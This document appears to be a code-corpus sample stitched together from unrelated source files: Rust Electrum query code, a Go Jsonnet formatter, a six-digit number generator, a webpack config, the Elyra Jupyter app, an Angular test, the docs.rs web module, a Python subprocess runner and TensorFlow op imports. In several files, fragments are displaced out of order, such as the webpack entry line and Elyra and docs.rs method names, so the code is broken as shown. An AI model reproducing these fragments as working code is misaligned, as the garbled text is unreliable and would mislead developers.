hex::decode(&value_hex).chain_err(|| "non-hex tx") }) } // Public API for transaction retrieval (for Electrum RPC) pub fn get_transaction(&self, tx_hash: &Txid, verbose: bool) -> Result<Value> { let _timer = self .duration .with_label_values(&["get_transaction"]) .start_timer(); let blockhash = self.lookup_confirmed_blockhash(tx_hash, /*block_height*/ None)?; self.app .daemon() .gettransaction_raw(tx_hash, blockhash, verbose) } pub fn get_headers(&self, heights: &[usize]) -> Vec<HeaderEntry> { let _timer = self .duration .with_label_values(&["get_headers"]) .start_timer(); let index = self.app.index(); heights .iter() .filter_map(|height| index.get_header(*height)) .collect() } pub fn get_best_header(&self) -> Result<HeaderEntry> { let last_header = self.app.index().best_header(); Ok(last_header.chain_err(|| "no headers indexed")?.clone()) } pub fn get_merkle_proof( &self, tx_hash: &Txid, height: usize, ) -> Result<(Vec<TxMerkleNode>, usize)> { let header_entry = self .app .index() .get_header(height) .chain_err(|| format!("missing block #{}", height))?; let txids = self.app.daemon().getblocktxids(&header_entry.hash())?; let pos = txids .iter() .position(|txid| txid == tx_hash) .chain_err(|| format!("missing txid {}", tx_hash))?; let tx_nodes: Vec<TxMerkleNode> = txids .into_iter() .map(|txid| TxMerkleNode::from_inner(txid.into_inner())) .collect(); let (branch, _root) = create_merkle_branch_and_root(tx_nodes, pos); Ok((branch, pos)) } pub fn get_header_merkle_proof( &self, height: usize, cp_height: usize, ) -> Result<(Vec<Sha256dHash>, Sha256dHash)> { if cp_height < height { bail!("cp_height #{} < height #{}", cp_height, height); } let best_height = self.get_best_header()?.height(); if best_height < cp_height { bail!( "cp_height #{} above best block height #{}", cp_height, best_height ); } let heights: Vec<usize> = (0..=cp_height).collect(); let header_hashes: Vec<BlockHash> = self .get_headers(&heights) .into_iter() .map(|h| *h.hash()) .collect(); let merkle_nodes: Vec<Sha256dHash> = header_hashes .iter() .map(|block_hash| Sha256dHash::from_inner(block_hash.into_inner())) .collect(); assert_eq!(header_hashes.len(), heights.len()); Ok(create_merkle_branch_and_root(merkle_nodes, height)) } pub fn get_id_from_pos( &self, height: usize, tx_pos: usize, want_merkle: bool, ) -> Result<(Txid, Vec<TxMerkleNode>)> { let header_entry = self .app .index() .get_header(height) .chain_err(|| format!("missing block #{}", height))?; let txids = self.app.daemon().getblocktxids(header_entry.hash())?; let txid = *txids .get(tx_pos) .chain_err(|| format!("No tx in position #{} in block #{}", tx_pos, height))?; let tx_nodes = txids .into_iter() .map(|txid| TxMerkleNode::from_inner(txid.into_inner())) .collect(); let branch = if want_merkle { create_merkle_branch_and_root(tx_nodes, tx_pos).0 } else { vec![] }; Ok((txid, branch)) } pub fn broadcast(&self, txn: &Transaction) -> Result<Txid> { self.app.daemon().broadcast(txn) } pub fn update_mempool(&self) -> Result<()> { let _timer = self .duration .with_label_values(&["update_mempool"]) .start_timer(); self.tracker.write().unwrap().update(self.app.daemon()) } /// Returns [vsize, fee_rate] pairs (measured in vbytes and satoshis). pub fn get_fee_histogram(&self) -> Vec<(f32, u32)> { self.tracker.read().unwrap().fee_histogram().clone() } // Fee rate [BTC/kB] to be confirmed in `blocks` from now. pub fn estimate_fee(&self, blocks: usize) -> f64 { let mut total_vsize = 0u32; let mut last_fee_rate = 0.0; let blocks_in_vbytes = (blocks * 1_000_000) as u32; // assume ~1MB blocks for (fee_rate, vsize) in self.tracker.read().unwrap().fee_histogram() { last_fee_rate = *fee_rate; total_vsize += vsize; if total_vsize >= blocks_in_vbytes { break; // under-estimate the fee rate a bit } } (last_fee_rate as f64) * 1e-5 // [BTC/kB] = 10^5 [sat/B] } pub fn get_banner(&self) -> Result<String> { self.app.get_banner() } pub fn get_relayfee(&self) -> Result<f64> { self.app.daemon().get_relayfee() } }
{ spending.push(spent); }
format.go
package tanka import ( "fmt" "os" "github.com/gobwas/glob" "github.com/google/go-jsonnet/formatter" "github.com/grafana/tanka/pkg/jsonnet" "github.com/pkg/errors" ) // FormatOpts modify the behaviour of Format type FormatOpts struct { // Excludes are a list of globs to exclude files while searching for Jsonnet // files Excludes []glob.Glob // OutFn receives the formatted file and it's name. If left nil, the file // will be formatted in place. OutFn OutFn // PrintNames causes all filenames to be printed PrintNames bool } // OutFn is a function that receives the formatted file for further action, // like persisting to disc type OutFn func(name, content string) error // FormatFiles takes a list of files and directories, processes them and returns // which files were formatted and perhaps an error. func FormatFiles(fds []string, opts *FormatOpts) ([]string, error) { var paths []string for _, f := range fds { fs, err := jsonnet.FindFiles(f, opts.Excludes) if err != nil { return nil, errors.Wrap(err, "finding Jsonnet files") } paths = append(paths, fs...) } // if nothing defined, default to save inplace outFn := opts.OutFn if outFn == nil { outFn = func(name, content string) error { return os.WriteFile(name, []byte(content), 0644) } } // print each file? printFn := func(...interface{}) { return } if opts.PrintNames { printFn = func(i ...interface{}) { fmt.Println(i...) } } var changed []string for _, p := range paths { content, err := os.ReadFile(p) if err != nil { return nil, err } formatted, err := Format(p, string(content))
if err != nil { return nil, err } if string(content) != formatted { printFn("fmt", p) changed = append(changed, p) } else { printFn("ok ", p) } if err := outFn(p, formatted); err != nil { return nil, err } } return changed, nil } // Format takes a file's name and contents and returns them in properly // formatted. The file does not have to exist on disk. func Format(filename string, content string) (string, error) { return formatter.Format(filename, content, formatter.DefaultOptions()) }
6-num.py
sys.stdout = open("6-num.txt", "w") data = "1234567890" for a in data: for b in data:
print(a+b+c+d+e+f) sys.stdout.close()
for c in data: for d in data: for e in data: for f in data:
webpack.config.js
const path = require('path'); const HtmlWebpackPlugin = require(`html-webpack-plugin`); const CircularDependencyPlugin = require('circular-dependency-plugin'); module.exports = { devtool: 'source-map',
context: path.resolve(__dirname, 'src'), output: { path: path.resolve(__dirname, '../docs'), filename: 'bundle.js' }, module: { loaders: [{ test: /\.js$/, loader: 'babel-loader', exclude: /node_modules/ }, { test: /\.scss$/, loaders: ['style-loader/useable', 'css-loader', 'postcss-loader', 'sass-loader'], exclude: /node_modules/ }, { test: /\.css$/, loaders: ['style-loader/useable', 'css-loader'], exclude: /node_modules/ }, { test: /\.(woff|woff2|ttf|eot|ico|png|gif|jpg|jpeg)(\?|$)/, loader: 'file-loader', }] }, plugins: [ new HtmlWebpackPlugin({ template: 'index.html', favicon: 'favicon.ico', inject: 'body', cache: true, showErrors: true }), new CircularDependencyPlugin({ exclude: /node_modules/, failOnError: true, }), ], devServer: { contentBase: 'src-docs/build', host: 'localhost', port: 8030, disableHostCheck: true } };
entry: { guide: './index.js' },
elyra_app.py
# # Copyright 2018-2021 Elyra Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os from jupyter_server.extension.application import ExtensionApp from jupyter_server.extension.application import ExtensionAppJinjaMixin from elyra._version import __version__ from elyra.api.handlers import YamlSpecHandler from elyra.contents.handlers import ContentHandler from elyra.metadata.handlers import MetadataHandler from elyra.metadata.handlers import MetadataResourceHandler from elyra.metadata.handlers import SchemaHandler from elyra.metadata.handlers import SchemaResourceHandler from elyra.metadata.handlers import SchemaspaceHandler from elyra.metadata.handlers import SchemaspaceResourceHandler from elyra.metadata.manager import MetadataManager from elyra.metadata.schema import SchemaManager from elyra.metadata.storage import FileMetadataCache from elyra.pipeline.catalog_connector import ComponentCatalogConnector from elyra.pipeline.component_registry import ComponentRegistry from elyra.pipeline.handlers import PipelineComponentHandler from elyra.pipeline.handlers import PipelineComponentPropertiesHandler from elyra.pipeline.handlers import PipelineExportHandler from elyra.pipeline.handlers import PipelineSchedulerHandler from elyra.pipeline.handlers import PipelineValidationHandler from elyra.pipeline.processor import PipelineProcessor from elyra.pipeline.processor import PipelineProcessorManager from elyra.pipeline.processor import PipelineProcessorRegistry from elyra.pipeline.validation import PipelineValidationManager DEFAULT_STATIC_FILES_PATH = os.path.join(os.path.dirname(__file__), "static") DEFAULT_TEMPLATE_FILES_PATH = os.path.join(os.path.dirname(__file__), "templates") class ElyraApp(ExtensionAppJinjaMixin, ExtensionApp): # The name of the extension. name = "elyra" version = __version__ description = "Elyra Server" extension_url = '/lab' load_other_extensions = True classes = [FileMetadataCache, MetadataManager, PipelineProcessor, ComponentCatalogConnector, ComponentRegistry] # Local path to static files directory. # static_paths = [ # DEFAULT_STATIC_FILES_PATH # ] # Local path to templates directory. # template_paths = [ # DEFAULT_TEMPLATE_FILES_PATH # ] # Define ElyraApp configurables here.. def initialize_handlers(self): schemaspace_regex = r"(?P<schemaspace>[\w\.\-]+)" resource_regex = r"(?P<resource>[\w\.\-]+)" path_regex = r"(?P<path>(?:(?:/[^/]+)+|/?))" # same as jupyter server and will include a leading slash processor_regex = r"(?P<processor>[\w]+)" component_regex = r"(?P<component_id>[\w\.\-:]+)" self.handlers.extend([ (f'/{self.name}/{YamlSpecHandler.get_resource_metadata()[0]}', YamlSpecHandler), (f'/{self.name}/metadata/{schemaspace_regex}', MetadataHandler), (f'/{self.name}/metadata/{schemaspace_regex}/{resource_regex}', MetadataResourceHandler), (f'/{self.name}/schema/{schemaspace_regex}', SchemaHandler), (f'/{self.name}/schema/{schemaspace_regex}/{resource_regex}', SchemaResourceHandler), (f'/{self.name}/schemaspace', SchemaspaceHandler), (f'/{self.name}/schemaspace/{schemaspace_regex}', SchemaspaceResourceHandler), (f'/{self.name}/pipeline/schedule', PipelineSchedulerHandler), (f'/{self.name}/pipeline/export', PipelineExportHandler), (f'/{self.name}/pipeline/components/{processor_regex}', PipelineComponentHandler), (f'/{self.name}/pipeline/components/{processor_regex}/{component_regex}/properties', PipelineComponentPropertiesHandler), (f'/{self.name}/contents/properties{path_regex}', ContentHandler), (f'/{self.name}/elyra/pipeline/validate', PipelineValidationHandler), ]) def initialize_settings(self): self.log.info('Config {}'.format(self.config)) # Instantiate singletons with appropriate parent to enable configurability, and convey # root_dir to PipelineProcessorManager. PipelineProcessorRegistry.instance(root_dir=self.settings['server_root_dir'], parent=self) PipelineProcessorManager.instance(root_dir=self.settings['server_root_dir'], parent=self) PipelineValidationManager.instance(root_dir=self.settings['server_root_dir'], parent=self) FileMetadataCache.instance(parent=self) SchemaManager.instance(parent=self) def
(self): pass launch_instance = ElyraApp.launch_instance
initialize_templates
country-measures-popup.component.spec.ts
import { async, ComponentFixture, TestBed } from '@angular/core/testing'; import { CountryMeasuresPopupComponent } from './country-measures-popup.component'; describe('CountryMeasuresPopupComponent', () => { let component: CountryMeasuresPopupComponent; let fixture: ComponentFixture<CountryMeasuresPopupComponent>; beforeEach(async(() => { TestBed.configureTestingModule({
})); beforeEach(() => { fixture = TestBed.createComponent(CountryMeasuresPopupComponent); component = fixture.componentInstance; fixture.detectChanges(); }); it('should create', () => { expect(component).toBeTruthy(); }); });
declarations: [ CountryMeasuresPopupComponent ] }) .compileComponents();
mod.rs
//! Web interface of cratesfyi pub mod page; /// ctry! (cratesfyitry) is extremely similar to try! and itry! /// except it returns an error page response instead of plain Err. macro_rules! ctry { ($result:expr) => (match $result { Ok(v) => v, Err(e) => { return super::page::Page::new(format!("{:?}", e)).title("An error has occured") .set_status(::iron::status::BadRequest).to_resp("resp"); } }) } /// cexpect will check an option and if it's not Some /// it will return an error page response macro_rules! cexpect { ($option:expr) => (match $option { Some(v) => v, None => { return super::page::Page::new("Resource not found".to_owned()) .title("An error has occured") .set_status(::iron::status::BadRequest).to_resp("resp"); } }) } /// Gets an extension from Request macro_rules! extension { ($req:expr, $ext:ty) => ( cexpect!($req.extensions.get::<$ext>()) ) } mod rustdoc; mod releases; mod crate_details; mod source; mod pool; mod file; mod builds; mod error; mod sitemap; use std::env; use std::error::Error; use std::time::Duration; use std::path::PathBuf; use iron::prelude::*; use iron::{Handler, status}; use iron::headers::{CacheControl, CacheDirective, ContentType}; use router::{Router, NoRoute}; use staticfile::Static; use handlebars_iron::{HandlebarsEngine, DirectorySource}; use time; use postgres::Connection; use semver::{Version, VersionReq}; use rustc_serialize::json::{Json, ToJson}; use std::collections::BTreeMap; /// Duration of static files for staticfile and DatabaseFileHandler (in seconds) const STATIC_FILE_CACHE_DURATION: u64 = 60 * 60 * 24 * 30 * 12; // 12 months const STYLE_CSS: &'static str = include_str!(concat!(env!("OUT_DIR"), "/style.css")); const OPENSEARCH_XML: &'static [u8] = include_bytes!("opensearch.xml"); struct CratesfyiHandler { router_handler: Box<Handler>, database_file_handler: Box<Handler>, static_handler: Box<Handler>, } impl CratesfyiHandler { fn chain<H: Handler>(base: H) -> Chain { // TODO: Use DocBuilderOptions for paths let mut hbse = HandlebarsEngine::new(); hbse.add(Box::new(DirectorySource::new("./templates", ".hbs"))); // load templates if let Err(e) = hbse.reload() { panic!("Failed to load handlebar templates: {}", e.description()); } let mut chain = Chain::new(base); chain.link_before(pool::Pool::new()); chain.link_after(hbse); chain } pub fn new() -> CratesfyiHandler { let mut router = Router::new(); router.get("/", releases::home_page, "index"); router.get("/style.css", style_css_handler, "style_css"); router.get("/about", |_: &mut Request| page::Page::new(false).title("About Docs.rs").to_resp("about"), "about"); router.get("/robots.txt", sitemap::robots_txt_handler, "robots_txt"); router.get("/sitemap.xml", sitemap::sitemap_handler, "sitemap_xml"); router.get("/opensearch.xml", opensearch_xml_handler, "opensearch_xml"); router.get("/releases", releases::releases_handler, "releases"); router.get("/releases/feed", releases::releases_feed_handler, "releases_feed"); router.get("/releases/recent/:page", releases::releases_handler, "releases_recent_page"); router.get("/releases/stars", releases::stars_handler, "releases_stars"); router.get("/releases/stars/:page", releases::stars_handler, "releases_stars_page"); router.get("/releases/:author", releases::author_handler, "releases_author"); router.get("/releases/:author/:page", releases::author_handler, "releases_author_page"); router.get("/releases/activity", releases::activity_handler, "releases_activity"); router.get("/releases/search", releases::search_handler, "releases_search"); router.get("/releases/queue", releases::build_queue_handler, "releases_queue"); router.get("/crate/:name", crate_details::crate_details_handler, "crate_name"); router.get("/crate/:name/", crate_details::crate_details_handler, "crate_name_"); router.get("/crate/:name/:version", crate_details::crate_details_handler, "crate_name_version"); router.get("/crate/:name/:version/", crate_details::crate_details_handler, "crate_name_version_"); router.get("/crate/:name/:version/builds", builds::build_list_handler, "crate_name_version_builds"); router.get("/crate/:name/:version/builds.json", builds::build_list_handler, "crate_name_version_builds_json"); router.get("/crate/:name/:version/builds/:id", builds::build_list_handler, "crate_name_version_builds_id"); router.get("/crate/:name/:version/source/", source::source_browser_handler, "crate_name_version_source"); router.get("/crate/:name/:version/source/*", source::source_browser_handler, "crate_name_version_source_"); router.get("/:crate", rustdoc::rustdoc_redirector_handler, "crate"); router.get("/:crate/", rustdoc::rustdoc_redirector_handler, "crate_"); router.get("/:crate/badge.svg", rustdoc::badge_handler, "crate_badge"); router.get("/:crate/:version", rustdoc::rustdoc_redirector_handler, "crate_version"); router.get("/:crate/:version/", rustdoc::rustdoc_redirector_handler, "crate_version_"); router.get("/:crate/:version/search-index.js", rustdoc::rustdoc_html_server_handler, "crate_version_search_index_js"); router.get("/:crate/:version/settings.html", rustdoc::rustdoc_html_server_handler, "crate_version_settings_html"); router.get("/:crate/:version/all.html", rustdoc::rustdoc_html_server_handler, "crate_version_all_html"); router.get("/:crate/:version/aliases.js", rustdoc::rustdoc_html_server_handler, "crate_version_aliases_js"); router.get("/:crate/:version/:target", rustdoc::rustdoc_redirector_handler, "crate_version_target"); router.get("/:crate/:version/:target/", rustdoc::rustdoc_html_server_handler, "crate_version_target_"); router.get("/:crate/:version/:target/*.html", rustdoc::rustdoc_html_server_handler, "crate_version_target_html"); let router_chain = Self::chain(router); let prefix = PathBuf::from(env::var("CRATESFYI_PREFIX").unwrap()).join("public_html"); let static_handler = Static::new(prefix) .cache(Duration::from_secs(STATIC_FILE_CACHE_DURATION)); CratesfyiHandler { router_handler: Box::new(router_chain), database_file_handler: Box::new(file::DatabaseFileHandler), static_handler: Box::new(static_handler), } } } impl Handler for CratesfyiHandler { fn handle(&self, req: &mut Request) -> IronResult<Response> { // try router first then db/static file handler // return 404 if none of them return Ok self.router_handler .handle(req) .or_else(|e| { // if router fails try to serve files from database first self.database_file_handler.handle(req).or(Err(e)) }) .or_else(|e| { // and then try static handler. if all of them fails, return 404 self.static_handler.handle(req).or(Err(e)) }) .or_else(|e| { debug!("{}", e.description()); let err = if let Some(err) = e.error.downcast::<error::Nope>() { *err } else if e.error.downcast::<NoRoute>().is_some() { error::Nope::ResourceNotFound } else { panic!("all cratesfyi errors should be of type Nope"); }; Self::chain(err).handle(req) }) } } fn match_version(conn: &Connection, name: &str, version: Option<&str>) -> Option<String> { // version is an Option<&str> from router::Router::get // need to decode first use url::percent_encoding::percent_decode; let req_version = version.and_then(|v| { match percent_decode(v.as_bytes()).decode_utf8() { Ok(p) => Some(p.into_owned()), Err(_) => None, } }) .map(|v| if v == "newest" || v == "latest" { "*".to_owned() } else { v }) .unwrap_or("*".to_string()); let versions = { let mut versions = Vec::new(); let rows = conn.query("SELECT versions FROM crates WHERE name = $1", &[&name]).unwrap(); if rows.len() == 0 { return None; } let versions_json: Json = rows.get(0).get(0); for version in versions_json.as_array().unwrap() { let version: String = version.as_string().unwrap().to_owned(); versions.push(version); } versions }; // first check for exact match // we can't expect users to use semver in query for version in &versions { if version == &req_version { return Some(version.clone()); } } // Now try to match with semver let req_sem_ver = match VersionReq::parse(&req_version) { Ok(v) => v, Err(_) => return None, }; // we need to sort versions first let versions_sem = { let mut versions_sem: Vec<Version> = Vec::new(); for version in &versions { // in theory a crate must always have a semver compatible version // but check result just in case let version = match Version::parse(&version) { Ok(v) => v, Err(_) => return None, }; versions_sem.push(version); } versions_sem.sort(); versions_sem.reverse(); versions_sem }; // semver is acting weird for '*' (any) range if a crate only have pre-release versions // return first version if requested version is '*' if req_version == "*" && !versions_sem.is_empty() { return Some(format!("{}", versions_sem[0])); } for version in &versions_sem { if req_sem_ver.matches(&version) { return Some(format!("{}", version)); } } None } /// Wrapper around the Markdown parser and renderer to render markdown fn render_markdown(text: &str) -> String { use comrak::{markdown_to_html, ComrakOptions}; let options = { let mut options = ComrakOptions::default(); options.ext_superscript = true; options.ext_table = true; options.ext_autolink = true; options.ext_tasklist = true; options.ext_strikethrough = true; options }; markdown_to_html(text, &options) } /// Returns latest version if required version is not the latest /// req_version must be an exact version fn latest_version(versions_json: &Vec<String>, req_version: &str) -> Option<String> { let req_version = match Version::parse(req_version) { Ok(v) => v, Err(_) => return None, }; let versions = { let mut versions: Vec<Version> = Vec::new(); for version in versions_json { let version = match Version::parse(&version) { Ok(v) => v, Err(_) => return None, }; versions.push(version); } versions.sort(); versions.reverse(); versions }; if req_version != versions[0] { for i in 1..versions.len() { if req_version == versions[i] { return Some(format!("{}", versions[0])) } } } None } /// Starts cratesfyi web server pub fn start_web_server(sock_addr: Option<&str>) { let cratesfyi = CratesfyiHandler::new(); Iron::new(cratesfyi).http(sock_addr.unwrap_or("localhost:3000")).unwrap(); } /// Converts Timespec to nice readable relative time string fn duration_to_str(ts: time::Timespec) -> String { let tm = time::at(ts); let delta = time::now() - tm; if delta.num_days() > 5 { format!("{}", tm.strftime("%b %d, %Y").unwrap()) } else if delta.num_days() > 1 { format!("{} days ago", delta.num_days()) } else if delta.num_days() == 1 { "one day ago".to_string() } else if delta.num_hours() > 1 { format!("{} hours ago", delta.num_hours()) } else if delta.num_hours() == 1 { "an hour ago".to_string() } else if delta.num_minutes() > 1 { format!("{} minutes ago", delta.num_minutes()) } else if delta.num_minutes() == 1 { "one minute ago".to_string() } else if delta.num_seconds() > 0 { format!("{} seconds ago", delta.num_seconds()) } else { "just now".to_string() } } fn style_css_handler(_: &mut Request) -> IronResult<Response> { let mut response = Response::with((status::Ok, STYLE_CSS)); let cache = vec![CacheDirective::Public, CacheDirective::MaxAge(STATIC_FILE_CACHE_DURATION as u32)]; response.headers.set(ContentType("text/css".parse().unwrap())); response.headers.set(CacheControl(cache)); Ok(response) } fn opensearch_xml_handler(_: &mut Request) -> IronResult<Response> { let mut response = Response::with((status::Ok, OPENSEARCH_XML)); let cache = vec![CacheDirective::Public, CacheDirective::MaxAge(STATIC_FILE_CACHE_DURATION as u32)]; response.headers.set(ContentType("application/opensearchdescription+xml".parse().unwrap())); response.headers.set(CacheControl(cache)); Ok(response) } /// MetaData used in header #[derive(Debug)] pub struct MetaData { pub name: String, pub version: String, pub description: Option<String>, pub target_name: Option<String>, pub rustdoc_status: bool, } impl MetaData { pub fn
(conn: &Connection, name: &str, version: &str) -> Option<MetaData> { for row in &conn.query("SELECT crates.name, releases.version, releases.description, releases.target_name, releases.rustdoc_status FROM releases INNER JOIN crates ON crates.id = releases.crate_id WHERE crates.name = $1 AND releases.version = $2", &[&name, &version]) .unwrap() { return Some(MetaData { name: row.get(0), version: row.get(1), description: row.get(2), target_name: row.get(3), rustdoc_status: row.get(4), }); } None } } impl ToJson for MetaData { fn to_json(&self) -> Json { let mut m: BTreeMap<String, Json> = BTreeMap::new(); m.insert("name".to_owned(), self.name.to_json()); m.insert("version".to_owned(), self.version.to_json()); m.insert("description".to_owned(), self.description.to_json()); m.insert("target_name".to_owned(), self.target_name.to_json()); m.insert("rustdoc_status".to_owned(), self.rustdoc_status.to_json()); m.to_json() } } #[cfg(test)] mod test { extern crate env_logger; use super::*; #[test] #[ignore] fn test_start_web_server() { // FIXME: This test is doing nothing let _ = env_logger::init(); start_web_server(None); } #[test] fn test_latest_version() { let versions = vec!["1.0.0".to_string(), "1.1.0".to_string(), "0.9.0".to_string(), "0.9.1".to_string()]; assert_eq!(latest_version(&versions, "1.1.0"), None); assert_eq!(latest_version(&versions, "1.0.0"), Some("1.1.0".to_owned())); assert_eq!(latest_version(&versions, "0.9.0"), Some("1.1.0".to_owned())); assert_eq!(latest_version(&versions, "invalidversion"), None); } }
from_crate
example.py
import os import shutil import subprocess runinfo_fname = os.path.abspath('./example.runinfo') output_directory = os.path.abspath('./runfiles/output/') if os.path.isdir(output_directory): shutil.rmtree(output_directory, ignore_errors=True) print('making {}'.format(output_directory)) os.mkdir(output_directory) print('Directory exists: {}'.format(os.path.isdir(output_directory)))
verbose_fname = os.path.join(output_directory, 'example.verbose') done_file = os.path.join(output_directory, 'example.done') cmd = "rm -f %s; %s %s >> %s; echo Done! >> %s" % (done_file, path_to_trainpredict, runinfo_fname, verbose_fname, done_file) process_id = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = process_id.communicate() print('Directory exists: {}'.format(os.path.isdir(output_directory))) if err or err2 or not os.path.isfile(done_file): print('Error: while executing command:\n{}'.format(cmd)) print(err) else: print('Done!') print('Directory exists: {}'.format(os.path.isdir(output_directory)))
path_to_trainpredict = os.path.abspath('../build/src/cpp/score_shuffle')
standard_ops.py
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # pylint: disable=unused-import """Import names of Tensor Flow standard Ops.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import sys as _sys # pylint: disable=g-bad-import-order # Imports the following modules so that @RegisterGradient get executed. from tensorflow.python.ops import array_grad from tensorflow.python.ops import cudnn_rnn_grad from tensorflow.python.ops import data_flow_grad from tensorflow.python.ops import manip_grad from tensorflow.python.ops import math_grad from tensorflow.python.ops import sparse_grad from tensorflow.python.ops import spectral_grad from tensorflow.python.ops import state_grad from tensorflow.python.ops import tensor_array_grad from tensorflow.python.util.all_util import remove_undocumented # go/tf-wildcard-import # pylint: disable=wildcard-import from tensorflow.python.ops.array_ops import * from tensorflow.python.ops.check_ops import * from tensorflow.python.ops.clip_ops import * from tensorflow.python.ops.special_math_ops import * # TODO(vrv): Switch to import * once we're okay with exposing the module. from tensorflow.python.ops.confusion_matrix import confusion_matrix from tensorflow.python.ops.control_flow_ops import Assert from tensorflow.python.ops.control_flow_ops import case from tensorflow.python.ops.control_flow_ops import cond from tensorflow.python.ops.control_flow_ops import group from tensorflow.python.ops.control_flow_ops import no_op from tensorflow.python.ops.control_flow_ops import tuple # pylint: disable=redefined-builtin # pylint: enable=redefined-builtin from tensorflow.python.ops.control_flow_ops import while_loop from tensorflow.python.ops.data_flow_ops import * from tensorflow.python.ops.functional_ops import * from tensorflow.python.ops.gradients import * from tensorflow.python.ops.histogram_ops import * from tensorflow.python.ops.init_ops import * from tensorflow.python.ops.io_ops import * from tensorflow.python.ops.linalg_ops import * from tensorflow.python.ops.logging_ops import Print from tensorflow.python.ops.logging_ops import get_summary_op from tensorflow.python.ops.logging_ops import timestamp from tensorflow.python.ops.lookup_ops import initialize_all_tables from tensorflow.python.ops.lookup_ops import tables_initializer from tensorflow.python.ops.manip_ops import * from tensorflow.python.ops.math_ops import * from tensorflow.python.ops.numerics import * from tensorflow.python.ops.parsing_ops import * from tensorflow.python.ops.partitioned_variables import * from tensorflow.python.ops.random_ops import * from tensorflow.python.ops.script_ops import py_func from tensorflow.python.ops.session_ops import * from tensorflow.python.ops.sparse_ops import * from tensorflow.python.ops.state_ops import assign from tensorflow.python.ops.state_ops import assign_add from tensorflow.python.ops.state_ops import assign_sub from tensorflow.python.ops.state_ops import count_up_to from tensorflow.python.ops.state_ops import scatter_add from tensorflow.python.ops.state_ops import scatter_div from tensorflow.python.ops.state_ops import scatter_mul from tensorflow.python.ops.state_ops import scatter_sub from tensorflow.python.ops.state_ops import scatter_min from tensorflow.python.ops.state_ops import scatter_max from tensorflow.python.ops.state_ops import scatter_update from tensorflow.python.ops.state_ops import scatter_nd_add from tensorflow.python.ops.state_ops import scatter_nd_sub # TODO(simister): Re-enable once binary size increase due to scatter_nd # ops is under control. # from tensorflow.python.ops.state_ops import scatter_nd_mul # from tensorflow.python.ops.state_ops import scatter_nd_div from tensorflow.python.ops.state_ops import scatter_nd_update from tensorflow.python.ops.string_ops import * from tensorflow.python.ops.template import * from tensorflow.python.ops.tensor_array_ops import * from tensorflow.python.ops.variable_scope import * from tensorflow.python.ops.variables import * # pylint: enable=wildcard-import # pylint: enable=g-bad-import-order #### For use in remove_undocumented below: from tensorflow.python.framework import constant_op as _constant_op from tensorflow.python.ops import array_ops as _array_ops from tensorflow.python.ops import check_ops as _check_ops from tensorflow.python.ops import clip_ops as _clip_ops from tensorflow.python.ops import confusion_matrix as _confusion_matrix from tensorflow.python.ops import control_flow_ops as _control_flow_ops from tensorflow.python.ops import data_flow_ops as _data_flow_ops from tensorflow.python.ops import functional_ops as _functional_ops from tensorflow.python.ops import gradients as _gradients from tensorflow.python.ops import histogram_ops as _histogram_ops from tensorflow.python.ops import init_ops as _init_ops from tensorflow.python.ops import io_ops as _io_ops from tensorflow.python.ops import linalg_ops as _linalg_ops from tensorflow.python.ops import logging_ops as _logging_ops from tensorflow.python.ops import manip_ops as _manip_ops from tensorflow.python.ops import math_ops as _math_ops from tensorflow.python.ops import numerics as _numerics from tensorflow.python.ops import parsing_ops as _parsing_ops from tensorflow.python.ops import partitioned_variables as _partitioned_variables from tensorflow.python.ops import random_ops as _random_ops from tensorflow.python.ops import script_ops as _script_ops from tensorflow.python.ops import session_ops as _session_ops from tensorflow.python.ops import sparse_ops as _sparse_ops from tensorflow.python.ops import special_math_ops as _special_math_ops from tensorflow.python.ops import state_ops as _state_ops from tensorflow.python.ops import string_ops as _string_ops from tensorflow.python.ops import template as _template from tensorflow.python.ops import tensor_array_ops as _tensor_array_ops from tensorflow.python.ops import variable_scope as _variable_scope from tensorflow.python.ops import variables as _variables _allowed_symbols_math_ops = [ # TODO(drpng): decide if we want to reference these in the documentation. "reduced_shape", "sparse_segment_mean_grad", "sparse_segment_sqrt_n_grad", # Legacy: will be removed. "arg_max", "arg_min", "lin_space", "sparse_matmul", # Use tf.matmul. # Deprecated (see versions.h): "batch_fft", "batch_fft2d", "batch_fft3d", "batch_ifft", "batch_ifft2d", "batch_ifft3d", "mul", # use tf.multiply instead. "neg", # use tf.negative instead. "sub", # use tf.subtract instead. # These are documented in nn. # We are not importing nn because it would create a circular dependency. "sigmoid", "log_sigmoid", "tanh", ] _allowed_symbols_array_ops = [ # TODO(drpng): make sure they are documented. # Scalars: "NEW_AXIS", "SHRINK_AXIS", "newaxis", # Documented in training.py. # I do not import train, to avoid circular dependencies. # TODO(drpng): this is defined in gen_array_ops, clearly not the right # place. "stop_gradient", # See gen_docs_combined for tf.copy documentation. "copy", ## TODO(drpng): make them inaccessible directly. ## TODO(drpng): Below, to-doc means that we need to find an appropriate ## documentation section to reference. ## For re-exporting to tf.*: "constant", "edit_distance", # to-doc # From gen_array_ops: "copy_host", # to-doc "immutable_const", # to-doc "invert_permutation", # to-doc "quantize_and_dequantize", # to-doc # TODO(drpng): legacy symbols to be removed. "batch_matrix_diag", "batch_matrix_band_part", "batch_matrix_diag_part", "batch_matrix_set_diag", ] _allowed_symbols_partitioned_variables = [ "PartitionedVariable", # Requires doc link. # Legacy. "create_partitioned_variables", "variable_axis_size_partitioner", "min_max_variable_partitioner", "fixed_size_partitioner", ] _allowed_symbols_control_flow_ops = [ # TODO(drpng): Find a place in the documentation to reference these or # remove. "control_trigger", "loop_cond", "merge", "switch", ] _allowed_symbols_functional_ops = [ "nest", # Used by legacy code. ] _allowed_symbols_gradients = [ # Documented in training.py: # Not importing training.py to avoid complex graph dependencies. "AggregationMethod", "GradientTape", "custom_gradient", "gradients", # tf.gradients = gradients.gradients "hessians", ] 